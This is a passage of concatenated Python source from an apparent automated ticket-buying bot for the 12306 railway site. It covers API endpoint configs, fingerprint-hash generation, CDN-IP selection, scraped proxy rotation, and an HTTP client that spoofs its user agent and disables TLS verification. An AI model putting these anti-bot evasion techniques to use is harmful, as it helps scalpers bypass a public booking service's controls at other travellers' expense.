params = {} for key, item in data.items(): d += key + item key = data_trans[key] if key in data_trans else key params[key] = item d_len = len(d) d_f = int(d_len / 3) if d_len % 3 == 0 else int(d_len / 3) + 1 if d_len >= 3: d = d[d_f:2 * d_f] + d[2 * d_f:d_len] + d[0: d_f] d_len = len(d) d_f = int(d_len / 3) if d_len % 3 == 0 else int(d_len / 3) + 1 if d_len >= 3: d = d[2 * d_f:d_len] + d[0: d_f] + d[1 * d_f: 2 * d_f] d = _encode_data_str_v2(d) d = _encode_data_str_v2(d) d = _encode_data_str_v2(d) data_str = _encode_string(d) params['hashCode'] = data_str return params def _encode_data_str_v2(d): b = len(d) if b % 2 == 0: return d[b // 2: b] + d[0:b // 2] else: return d[b // 2 + 1:b] + d[b // 2] + d[0:b // 2] def _encode_string(str): import hashlib import base64 result = 
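# Sketch (illustrative, not part of the original sources): _get_hash_code_params() above
# obfuscates the concatenated fingerprint string by rotating its thirds and applying
# _encode_data_str_v2 three times before hashing. A standalone copy of that half-swap step,
# on an arbitrary sample string, to make the transformation easier to follow:
def half_swap(d):
    b = len(d)
    if b % 2 == 0:
        return d[b // 2:] + d[:b // 2]
    return d[b // 2 + 1:] + d[b // 2] + d[:b // 2]

s = "abcdefg"
print(half_swap(s))             # 'efgdabc' - back half, middle char, front half
print(half_swap(half_swap(s)))  # the swap is its own inverse, so two applications restore the input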
base64.b64encode(hashlib.sha256(str.encode()).digest()).decode() return result.replace('+', '-').replace('/', '_').replace('=', '') File: config/TicketEnmu.py # coding=utf-8 from enum import Enum class ticket(object): QUERY_C = u"查询到有余票,尝试提交订单" QUERY_IN_BLACK_LIST = u"该车次{} 正在被关小黑屋,跳过此车次" SUCCESS_CODE = 000000 FAIL_CODE = 999999 AUTO_SUBMIT_ORDER_REQUEST_C = u"提交订单成功" AUTO_SUBMIT_ORDER_REQUEST_F = u"提交订单失败,重新刷票中" AUTO_SUBMIT_NEED_CODE = u"需要验证码" AUTO_SUBMIT_NOT_NEED_CODE = u"不需要验证码" TICKET_BLACK_LIST_TIME = 5 # 加入小黑屋的等待时间,默认5 min DTO_NOT_FOUND = u"未查找到常用联系人, 请查证后添加!!" DTO_NOT_IN_LIST = u"联系人不在列表中,请查证后添加!!" QUEUE_TICKET_SHORT = u"当前余票数小于乘车人数,放弃订票" QUEUE_TICKET_SUCCESS = u"排队成功, 当前余票还剩余: {0}张" QUEUE_JOIN_BLACK = u"排队发现未知错误{0},将此列车 {1}加入小黑屋" QUEUE_WARNING_MSG = u"排队异常,错误信息:{0}, 将此列车 {1}加入小黑屋" OUT_NUM = 120 # 排队请求12306的次数 WAIT_OUT_NUM = u"超出排队时间,自动放弃,正在重新刷票" WAIT_ORDER_SUCCESS = u"恭喜您订票成功,订单号为:{0}, 请立即打开浏览器登录12306,访问‘未完成订单’,在30分钟内完成支付!" WAIT_AFTER_NATE_SUCCESS = u"候补订单已完成,请立即打开浏览器登录12306,访问‘候补订单’,在30分钟内完成支付!" WAIT_ORDER_CONTINUE = u"排队等待时间预计还剩 {0} ms" WAIT_ORDER_FAIL = u"排队等待失败,错误消息:{0}" WAIT_ORDER_NUM = u"第{0}次排队中,请耐心等待" WAIT_ORDER_SUB_FAIL = u"订单提交失败!,正在重新刷票" CANCEL_ORDER_SUCCESS = u"排队超时,已为您自动取消订单,订单编号: {0}" CANCEL_ORDER_FAIL = u"排队超时,取消订单失败, 订单号{0}" REST_TIME = u"12306休息时间,本程序自动停止,明天早上6点将自动运行" REST_TIME_PAST = u"休息时间已过,重新开启检票功能" LOGIN_SESSION_FAIL = u"用户检查失败:{0},可能未登录,可能session已经失效, 正在重新登录中" File: config/serverchanConf.py # -*- coding: utf8 -*- import TickerConfig from config.urlConf import urls from myUrllib.httpUtils import HTTPClient PUSH_SERVER_CHAN_PATH = "https://sc.ftqq.com" def sendServerChan(msg): """ pushBear微信通知 :param str: 通知内容 content :return: """ if ( TickerConfig.SERVER_CHAN_CONF["is_server_chan"] and TickerConfig.SERVER_CHAN_CONF["secret"].strip() != "" ): try: secret = TickerConfig.SERVER_CHAN_CONF["secret"].strip() sendServerChanUrls = urls.get("ServerChan") sendServerChanUrls["req_url"] += f'{secret}.send' params = {"text": "易行购票成功通知", "desp": msg} httpClint = HTTPClient(0) sendServerChanRsp = httpClint.send(sendServerChanUrls, params=params) if sendServerChanRsp.get("errno") == 0: print(u"已下发 Server酱 微信通知, 请查收") else: print(sendServerChanRsp) except Exception as e: print(u"Server酱 配置有误 {}".format(e)) if __name__ == "__main__": sendServerChan(1) File: config/urlConf.py # coding=utf-8 import random import TickerConfig import time urls = { "auth": { # 登录接口 "req_url": "/passport/web/auth/uamtk", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/resources/login.html", "Host": "kyfw.12306.cn", "Content-Type": 1, "re_try": 10, "re_time": 1, "s_time": 0.1, "is_logger": True, "is_json": True, "is_cdn": True, }, "uamtk-static": { # 登录接口 "req_url": "/passport/web/auth/uamtk-static", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/resources/login.html", "Host": "kyfw.12306.cn", "Content-Type": 1, "re_try": 10, "re_time": 3, "s_time": 0.1, "is_logger": True, "is_json": True, "is_cdn": True, }, "login": { # 登录接口 "req_url": "/passport/web/login", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/resources/login.html", "Host": "kyfw.12306.cn", "Content-Type": 1, "re_try": 10, "re_time": 1, "s_time": 0.5, "is_logger": True, "is_cdn": True, "is_json": True, }, "left_ticket_init": { # 登录接口 "req_url": "/otn/leftTicket/init", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/resources/login.html", "Host": "kyfw.12306.cn", "Content-Type": 1, "re_try": 10, "re_time": 1, "s_time": 0.1, "is_logger": False, "is_cdn": True, "is_json": False, }, "getCodeImg": { # 
登录验证码 "req_url": "/passport/captcha/captcha-image?login_site=E&module=login&rand=sjrand&{0}", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/resources/login.html", "Host": "kyfw.12306.cn", "Content-Type": 1, "re_try": 10, "re_time": 1, "s_time": 0.1, "is_logger": False, "is_json": False, "is_cdn": True, "not_decode": True, }, "getCodeImg1": { # 登录验证码 "req_url": "/passport/captcha/captcha-image64?login_site=E&module=login&rand=sjrand&{0}&callback=jQuery19108016482864806321_1554298927290&_=1554298927293", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/resources/login.html", "Host": "kyfw.12306.cn", "Content-Type": 1, "re_try": 10, "re_time": 1, "s_time": 0.1, "is_logger": True, "is_cdn": True, "is_json": False, }, "codeCheck": { # 验证码校验 "req_url": "/passport/captcha/captcha-check", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/resources/login.html", "Host": "kyfw.12306.cn", "Content-Type": 1, "re_try": 10, "re_time": 1, "s_time": 0.1, "is_logger": True, "is_cdn": True, "is_json": False, }, "codeCheck1": { # 验证码校验 "req_url": "/passport/captcha/captcha-check?callback=jQuery19108016482864806321_1554298927290&answer={0}&rand=sjrand&login_site=E&_={1}", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/resources/login.html", "Host": "kyfw.12306.cn", "Content-Type": 1, "re_try": 10, "re_time": 1, "s_time": 0.1, "is_cdn": True, "is_logger": True, "is_json": False, }, "loginInit": { # 登录页面 "req_url": "/otn/login/init", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/index/init", "Host": "kyfw.12306.cn", "re_try": 1, "re_time": 1, "s_time": 0.1, "is_logger": False, "is_cdn": True, "is_json": False, }, "loginInitCdn": { # 登录页面 "req_url": "/otn/login/init", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/index/init", "Host": "kyfw.12306.cn", "re_try": 1, "re_time": 1, "s_time": 0.1, "is_logger": False, "is_test_cdn": True, "is_cdn": True, "is_json": False, }, "loginInitCdn1": { # 登录页面 "req_url": "/otn/resources/login.html", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/view/index.html", "Host": "kyfw.12306.cn", "re_try": 1, "re_time": 1, "s_time": 0.1, "is_logger": False, "is_test_cdn": False, "is_cdn": True, "is_json": False, }, "getDevicesId": { # 获取用户信息 "req_url": "/otn/HttpZF/logdevice", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/passport?redirect=/otn/", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 1, "s_time": 0.01, "is_cdn": True, "is_logger": True, "is_json": False, }, "getUserInfo": { # 获取用户信息 "req_url": "/otn/index/initMy12306", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/passport?redirect=/otn/login/userLogin", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 1, "s_time": 0.01, "is_cdn": True, "is_logger": False, "is_json": False, }, "userLogin": { # 用户登录 "req_url": "/otn/login/userLogin", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/passport?redirect=/otn/login/userLogin", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 1, "s_time": 0.1, "is_logger": True, "is_cdn": True, "is_json": True, }, "uamauthclient": { # 登录 "req_url": "/otn/uamauthclient", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/passport?redirect=/otn/login/userLogin", "Host": "kyfw.12306.cn", "Content-Type": 1, "re_try": 10, "re_time": 1, "s_time": 0.1, "is_cdn": True, "is_logger": True, "is_json": True, }, "initdc_url": { # 生成订单页面 "req_url": "/otn/confirmPassenger/initDc", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.1, 
"s_time": 1, "is_logger": False, "is_cdn": True, "is_json": False, }, "GetJS": { # 订单页面js "req_url": "/otn/HttpZF/GetJS", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/confirmPassenger/initDc", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.1, "s_time": 0.1, "is_logger": False, "is_cdn": True, "is_json": False, }, "odxmfwg": { # 订单页面js "req_url": "/otn/dynamicJs/odxmfwg", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/confirmPassenger/initDc", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.1, "s_time": 0.1, "is_logger": False, "is_cdn": True, "is_json": False, }, "get_passengerDTOs": { # 获取乘车人 "req_url": "/otn/confirmPassenger/getPassengerDTOs", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/confirmPassenger/initDc", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.1, "s_time": 0.1, "is_cdn": True, "is_logger": True, "is_json": True, }, "select_url": { # 查询余票 "req_url": "/otn/{3}?leftTicketDTO.train_date={0}&leftTicketDTO.from_station={1}&leftTicketDTO.to_station={2}&purpose_codes=ADULT", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Host": "kyfw.12306.cn", "re_try": 1, "re_time": 0.01, "s_time": 0.01, "is_logger": False, "is_json": True, "is_cdn": True, }, "check_user_url": { # 检查用户登录 "req_url": "/otn/login/checkUser", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Host": "kyfw.12306.cn", "re_try": 1, "re_time": 1, "s_time": 1, "is_cdn": True, "is_logger": True, "is_json": True, }, "submit_station_url": { # 提交订单 "req_url": "/otn/leftTicket/submitOrderRequest", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.1, "is_cdn": True, "is_logger": True, "is_json": True, }, "checkOrderInfoUrl": { # 检查订单信息规范 "req_url": "/otn/confirmPassenger/checkOrderInfo", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/confirmPassenger/initDc", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.1, "is_logger": True, "is_cdn": True, "is_json": True, }, "getQueueCountUrl": { # 剩余余票数 "req_url": "/otn/confirmPassenger/getQueueCount", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/confirmPassenger/initDc", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.1, "is_logger": True, "is_cdn": True, "is_json": True, }, "checkQueueOrderUrl": { # 订单队列排队 "req_url": "/otn/confirmPassenger/confirmSingleForQueue", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/confirmPassenger/initDc", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.1, "is_logger": True, "is_cdn": True, "is_json": True, }, "checkRandCodeAnsyn": { # 暂时没用到 "req_url": "/otn/passcodeNew/checkRandCodeAnsyn", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/confirmPassenger/initDc", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.1, "is_cdn": True, "is_logger": True, "is_json": True, }, "codeImgByOrder": { # 订单页面验证码 "req_url": "/otn/passcodeNew/getPassCodeNew?module=passenger&rand=randp&{}", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/confirmPassenger/initDc", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.1, "is_logger": False, "is_cdn": True, "is_json": False, }, "queryOrderWaitTimeUrl": { # 订单等待页面 "req_url": "/otn/confirmPassenger/queryOrderWaitTime?random={0}&tourFlag=dc&_json_att=", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/confirmPassenger/initDc", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, 
"s_time": 0.1, "is_logger": True, "is_cdn": True, "is_json": True, }, "queryMyOrderNoCompleteUrl": { # 订单查询页面 "req_url": "/otn/queryOrder/queryMyOrderNoComplete", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/queryOrder/initNoComplete", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.1, "is_logger": True, "is_cdn": True, "is_json": True, }, "initNoCompleteUrl": { # 获取订单列表 "req_url": "/otn/queryOrder/initNoComplete", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/queryOrder/initNoComplete", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.1, "is_logger": False, "is_cdn": True, "is_json": False, }, "cancelNoCompleteMyOrder": { # 取消订单 "req_url": "/otn/queryOrder/cancelNoCompleteMyOrder", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/queryOrder/initNoComplete", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.1, "is_cdn": True, "is_logger": True, "is_json": True, }, "autoSubmitOrderRequest": { # 快速自动提交订单 "req_url": "/otn/confirmPassenger/autoSubmitOrderRequest", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Host": "kyfw.12306.cn", "Content-Type": 1, "re_try": 10, "re_time": 0.01, "s_time": 0.1, "is_logger": True, "is_cdn": True, "is_json": True, }, "getQueueCountAsync": { # 快速获取订单数据 "req_url": "/otn/confirmPassenger/getQueueCountAsync", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Host": "kyfw.12306.cn", "Content-Type": 1, "re_try": 10, "re_time": 0.01, "s_time": 0.1, "is_logger": True, "is_cdn": True, "is_json": True, }, "confirmSingleForQueueAsys": { # 快速订单排队 "req_url": "/otn/confirmPassenger/confirmSingleForQueueAsys", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Content-Type": 1, "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.1, "is_logger": True, "is_cdn": True, "is_json": True, }, "Pushbear": { # push通知 "req_url": "/sub", "req_type": "post", "Referer": "", "Content-Type": 1, "Host": "pushbear.ftqq.com", "re_try": 10, "re_time": 0.01, "s_time": 0.1, "is_logger": False, "is_json": True, }, "ServerChan": { # Server酱 push通知 "req_url": "/", "req_type": "get", "Referer": "", "Content-Type": 1, "Host": "sc.ftqq.com", "re_try": 10, "re_time": 0.01, "s_time": 0.1, "is_logger": True, "is_json": True, }, "loginHtml": { # 登录接口2 "req_url": "/otn/resources/login.html", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.3, "s_time": 0.1, "is_cdn": True, "is_logger": True, "is_json": True, }, "loginConf": { # 登录接口2 "req_url": "/otn/login/conf", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.3, "s_time": 0.1, "is_cdn": True, "is_logger": True, "is_json": True, }, "loginAysnSuggest": { # 登录接口2 "req_url": "/otn/login/loginAysnSuggest", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.3, "is_cdn": True, "s_time": 0.1, "is_logger": True, "is_json": True, }, # 候补订单接口 "chechFace": { # 人脸识别 "req_url": "/otn/afterNate/chechFace", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.01, "is_cdn": True, "is_logger": True, "is_json": True, }, "getSuccessRate": { # 成功信息 "req_url": "/otn/afterNate/getSuccessRate", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", 
"Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.01, "is_cdn": True, "is_logger": True, "is_json": True, }, "SubmitOrderRequestRsp": { # 提交候补订单准备 "req_url": "/otn/afterNate/submitOrderRequest", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.01, "is_cdn": True, "is_logger": True, "is_json": True, }, "confirmHB": { # 设置订单信息 "req_url": "/otn/afterNate/confirmHB", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.01, "is_cdn": True, "is_logger": True, "is_json": True, }, "queryQueue": { # 排队 "req_url": "/otn/afterNate/queryQueue", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.01, "is_cdn": True, "is_logger": True, "is_json": True, }, "passengerInitApi": { # 排队 "req_url": "/otn/afterNate/passengerInitApi", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.01, "is_cdn": True, "is_logger": True, "is_json": True, }, "autoVerifyImage": { # 云打码接口 "req_url": TickerConfig.REQ_URL, "req_type": "post", "Referer": "", "Host": TickerConfig.HOST, "re_try": 6, "re_time": 10, "s_time": 0.001, "is_logger": True, "is_json": True, "httpType": TickerConfig.HTTP_TYPE }, } File: agency/__init__.py File: agency/cdn_utils.py # encoding=utf8 import datetime import operator import os import requests from config import urlConf import threading from config.urlConf import urls from myUrllib.httpUtils import HTTPClient cdn_list = [] class CDNProxy(threading.Thread): def __init__(self, cdns): super().__init__() self.cdns = cdns self.urlConf = urlConf.urls self.httpClint = requests self.city_list = [] self.timeout = 5 def run(self): for cdn in self.cdns: http = HTTPClient(0) url = urls["loginInitCdn"] http._cdn = cdn.replace("\n", "") start_time = datetime.datetime.now() rep = http.send(url) retTime = (datetime.datetime.now() - start_time).microseconds / 1000 if rep and "message" not in rep and retTime < 3000: if cdn.replace("\n", "") not in cdn_list: # 如果有重复的cdn,则放弃加入 print(f"加入cdn: {cdn}") cdn_list.append({"ip": cdn.replace("\n", ""), "time": retTime}) def open_cdn_file(cdnFile): cdn = [] path = os.path.join(os.path.dirname(__file__), f'../{cdnFile}') try: with open(path, "r", encoding="utf-8") as f: for i in f.readlines(): if i and "kyfw.12306.cn:443" not in i: cdn.append(i.replace("\n", "")) return cdn except Exception: with open(path, "r") as f: for i in f.readlines(): if i and "kyfw.12306.cn:443" not in i: cdn.append(i.replace("\n", "")) return cdn def sortCdn(): """ 对cdn进行排序 :return: """ ips = [] cs = sorted(cdn_list, key=operator.itemgetter('time')) for c in cs: print(f"当前ip: {c['ip']}, 延时: {c['time']}") ips.append(c["ip"]) return ips def filterCdn(): """ 过滤cdn, 过滤逻辑为当前cdn响应值小于1000毫秒 过滤日志: 加入cdn: 116.77.75.146 :return: """ cdns = open_cdn_file("cdn_list") cdnss = [cdns[i:i + 50] for i in range(0, len(cdns), 50)] cdnThread = [] for cdn in cdnss: t = CDNProxy(cdn) cdnThread.append(t) for cdn_t in cdnThread: cdn_t.start() for cdn_j in cdnThread: cdn_j.join() print(f"当前有效cdn个数为: {len(cdn_list)}") if cdn_list: ips = sortCdn() path = os.path.join(os.path.dirname(__file__), f'../filter_cdn_list') f = open(path, "a+") f.seek(0) f.truncate() f.writelines("") for ip in ips: f.writelines(f"{ip}\n") f.close() if __name__ == 
'__main__': filterCdn() File: agency/agency_tools.py # encoding=utf8 import os import random import socket import time import requests from bs4 import BeautifulSoup class proxy: def __init__(self): self.proxy_list = [] self.proxy_filter_list = [] def get_proxy(self): """ 获取未加工代理列表 :return: """ User_Agent = 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0' header = dict() header['User-Agent'] = User_Agent for i in range(1, 5): time.sleep(1) url = 'http://www.xicidaili.com/nn/' + str(i) res = requests.get(url=url, headers=header).content soup = BeautifulSoup(res, "html.parser") ips = soup.findAll('tr') for x in range(1, len(ips)): ip = ips[x] tds = ip.findAll("td") ip_temp = tds[1].contents[0] + ":" + tds[2].contents[0] print(ip_temp) self.proxy_list.append(ip_temp) def filter_proxy(self): """ 将不可用IP剔除 :return: """ socket.setdefaulttimeout(1) path = os.path.join(os.path.dirname(__file__), './proxy_list') f = open(path, "w") head = { 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36', 'Connection': 'keep-alive'} url = "http://icanhazip.com" proxy_num = 0 for proxy in self.proxy_list: proxy_temp = {"https": "https://{}".format(proxy)} try: req = requests.get(url, proxies=proxy_temp, timeout=2, headers=head).content print(req) write_proxy = proxy + "\n" f.write(write_proxy) proxy_num += 1 except Exception: print ("代理链接超时,去除此IP:{0}".format(proxy)) continue print("总共可使用ip量为{}个".format(proxy_num)) def get_filter_proxy(self): """ 读取该可用ip文件 :return: 可用ip文件list """ path = os.path.join(os.path.dirname(__file__), './proxy_list') try: with open(path, "r", encoding="utf-8") as f: lins = f.readlines() for i in lins: p = i.strip("\n") self.proxy_filter_list.append(p) except Exception: with open(path, "r", ) as f: lins = f.readlines() for i in lins: p = i.strip("\n") self.proxy_filter_list.append(p) return self.proxy_filter_list def main(self): # self.get_proxy() self.filter_proxy() def setProxy(self): """ 开启此功能的时候请确保代理ip是否可用 查询的时候设置代理ip,ip设置格式是ip地址+端口,推荐可用的ip代理池:https://github.com/jhao104/proxy_pool :return: """ ip = self.get_filter_proxy() setIp = ip[random.randint(0, len(ip) - 1)] proxie = { 'http': 'http://{}'.format(setIp), 'https': 'http://{}'.format(setIp), } return proxie if __name__ == "__main__": a = proxy() print(a.get_filter_proxy()) File: myUrllib/httpUtils.py # -*- coding: utf8 -*- import json import random import socket from collections import OrderedDict from time import sleep import requests from fake_useragent import UserAgent import TickerConfig from agency.agency_tools import proxy from config import logger def _set_header_default(): header_dict = OrderedDict() # header_dict["Accept"] = "application/json, text/plain, */*" header_dict["Accept-Encoding"] = "gzip, deflate" header_dict[ "User-Agent"] = _set_user_agent() header_dict["Content-Type"] = "application/x-www-form-urlencoded; charset=UTF-8" header_dict["Origin"] = "https://kyfw.12306.cn" header_dict["Connection"] = "keep-alive" return header_dict def _set_user_agent(): # try: # user_agent = UserAgent(verify_ssl=False).random # return user_agent # except: # print("请求头设置失败,使用默认请求头") # return 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.' 
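# Sketch (illustrative, not part of the original sources): filter_proxy() above keeps only the
# scraped proxies that can fetch a test URL within a couple of seconds. A compact version of
# that check; the test URL matches the one used above, everything else is illustrative:
import requests

def proxy_works(ip_port, test_url="http://icanhazip.com", timeout=2):
    proxies = {"http": "http://{}".format(ip_port), "https": "https://{}".format(ip_port)}
    try:
        requests.get(test_url, proxies=proxies, timeout=timeout)
        return True
    except requests.RequestException:
        return False

# Example: usable = [p for p in scraped_proxies if proxy_works(p)]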
+ str( # random.randint(5000, 7000)) + '.0 Safari/537.36' return "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36" class HTTPClient(object): def __init__(self, is_proxy, cdnList=None): """ cdnList试试切换不包括查询的cdn,防止查询cdn污染登陆和下单cdn :param method: :param headers: Must be a dict. Such as headers={'Content_Type':'text/html'} """ self.initS() self._cdn = None self.cdnList = cdnList self._proxies = None if is_proxy is 1: self.proxy = proxy() self._proxies = self.proxy.setProxy() # print(u"设置当前代理ip为 {}, 请注意代理ip是否可用!!!!!请注意代理ip是否可用!!!!!请注意代理ip是否可用!!!!!".format(self._proxies)) def initS(self): self._s = requests.Session() self._s.headers.update(_set_header_default()) return self def set_cookies(self, kwargs): """ 设置cookies :param kwargs: :return: """ for kwarg in kwargs: for k, v in kwarg.items(): self._s.cookies.set(k, v) def get_cookies(self): """ 获取cookies :return: """ return self._s.cookies.values() def del_cookies(self): """ 删除所有的key :return: """ self._s.cookies.clear() def del_cookies_by_key(self, key): """ 删除指定key的session :return: """ self._s.cookies.set(key, None) def setHeaders(self, headers): self._s.headers.update(headers) return self def resetHeaders(self): self._s.headers.clear() self._s.headers.update(_set_header_default()) def getHeadersHost(self): return self._s.headers["Host"] def setHeadersHost(self, host): self._s.headers.update({"Host": host}) return self def setHeadersUserAgent(self): self._s.headers.update({"User-Agent": _set_user_agent()}) def getHeadersUserAgent(self): return self._s.headers["User-Agent"] def getHeadersReferer(self): return self._s.headers["Referer"] def setHeadersReferer(self, referer): self._s.headers.update({"Referer": referer}) return self @property def cdn(self): return self._cdn @cdn.setter def cdn(self, cdn): self._cdn = cdn def send(self, urls, data=None, **kwargs): """send request to url.If response 200,return response, else return None.""" allow_redirects = False is_logger = urls.get("is_logger", False) req_url = urls.get("req_url", "") re_try = urls.get("re_try", 0) s_time = urls.get("s_time", 0) is_cdn = urls.get("is_cdn", False) is_test_cdn = urls.get("is_test_cdn", False) error_data = {"code": 99999, "message": u"重试次数达到上限"} if data: method = "post" self.setHeaders({"Content-Length": "{0}".format(len(data))}) else: method = "get" self.resetHeaders() if TickerConfig.RANDOM_AGENT is 1: self.setHeadersUserAgent() self.setHeadersReferer(urls["Referer"]) if is_logger: logger.log( u"url: {0}\n入参: {1}\n请求方式: {2}\n".format(req_url, data, method)) self.setHeadersHost(urls["Host"]) if is_test_cdn: url_host = self._cdn elif is_cdn: if self._cdn: # print(u"当前请求cdn为{}".format(self._cdn)) url_host = self._cdn else: url_host = urls["Host"] else: url_host = urls["Host"] http = urls.get("httpType") or "https" for i in range(re_try): try: # sleep(urls["s_time"]) if "s_time" in urls else sleep(0.001) sleep(s_time) try: requests.packages.urllib3.disable_warnings() except: pass response = self._s.request(method=method, timeout=5, proxies=self._proxies, url=http + "://" + url_host + req_url, data=data, allow_redirects=allow_redirects, verify=False, **kwargs) if response.status_code == 200 or response.status_code == 302: if urls.get("not_decode", False): return response.content if response.content: if is_logger: logger.log( u"出参:{0}".format(response.content.decode())) if urls["is_json"]: return json.loads( response.content.decode() if isinstance(response.content, bytes) else response.content) else: return 
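# Sketch (illustrative, not part of the original sources): HTTPClient.send() above loops
# `re_try` times, pausing `s_time` between attempts and decoding JSON when the url config asks
# for it. A heavily simplified version of that retry-and-decode pattern; the field names mirror
# the url dictionaries defined earlier:
import json
import time
import requests

def send_with_retry(session, url_conf, data=None):
    method = "post" if data else "get"
    full_url = "https://" + url_conf["Host"] + url_conf["req_url"]
    for _ in range(url_conf.get("re_try", 1)):
        time.sleep(url_conf.get("s_time", 0))
        try:
            rsp = session.request(method, full_url, data=data, timeout=5)
            if rsp.status_code == 200 and rsp.content:
                return json.loads(rsp.content) if url_conf.get("is_json") else rsp.text
        except requests.RequestException:
            continue
    return {"code": 99999, "message": "retry limit reached"}

# Example: send_with_retry(requests.Session(), urls["check_user_url"], data={"_json_att": ""})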
response.content.decode("utf8", "ignore") if isinstance(response.content, bytes) else response.content else: print(f"url: {urls['req_url']}返回参数为空, 接口状态码: {response.status_code}") logger.log( u"url: {} 返回参数为空".format(urls["req_url"])) if self.cdnList: # 如果下单或者登陆出现cdn 302的情况,立马切换cdn url_host = self.cdnList.pop(random.randint(0, 4)) continue else: sleep(urls["re_time"]) except (requests.exceptions.Timeout, requests.exceptions.ReadTimeout, requests.exceptions.ConnectionError): pass except socket.error: pass return error_data File: myUrllib/__init__.py File: myUrllib/MySocketUtils.py # coding=utf-8 import json import socket import re # s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # s.connect(('183.232.189.31', 80)) # get_str = 'GET {0} HTTP/1.1\r\nConnection: close\r\n' \ # 'Host: %s\r\n' \ # 'User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36' \ # '\r\nAccept: */*\r\n' \ # '\r\n' # post_str = "POST {0} HTTP/1.1\r\n" \ # "Host: kyfw.12306.cn\r\n" \ # "Connection: close\r\n"\ # "Origin: https://kyfw.12306.cn\r\n" \ # "X-Requested-With: XMLHttpRequest\r\n" \ # "Referer: https://kyfw.12306.cn/otn/leftTicket/init\r\n" \ # "Accept-Language: zh-CN,zh;q=0.9,en;q=0.8\r\n" \ # 